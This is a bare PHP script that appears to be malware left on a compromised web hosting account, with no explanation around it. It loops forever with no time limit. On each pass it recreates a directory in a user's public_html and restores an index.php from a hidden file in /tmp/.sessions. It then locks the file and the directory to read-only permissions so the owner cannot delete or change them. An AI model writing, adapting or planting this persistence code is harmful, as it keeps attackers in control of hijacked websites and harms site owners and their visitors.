
<?php
@ini_set("max_execution_time", 0);
while (True){
    if (!file_exists("/home/r2745769/public_html/koube-lexus-kaitori.click")){
        mkdir("/home/r2745769/public_html/koube-lexus-kaitori.click");
    }
    if (!file_exists("/proc/17851/fd/index.php")){
        $text = base64_encode(file_get_contents("/tmp/.sessions/.L3Byb2MvMTc4NTEvZmRpbmRleC10ZXh0"));
        file_put_contents("/proc/17851/fd/index.php", base64_decode($text));
    }
    if (gecko_perm("/proc/17851/fd/index.php") != 0444){
        chmod("/proc/17851/fd/index.php", 0444);
    }
    if (gecko_perm("/home/r2745769/public_html/koube-lexus-kaitori.click") != 0555){
        chmod("/home/r2745769/public_html/koube-lexus-kaitori.click", 0555);
    }
}

function gecko_perm($flename){
    return substr(sprintf("%o", fileperms($flename)), -4);
}
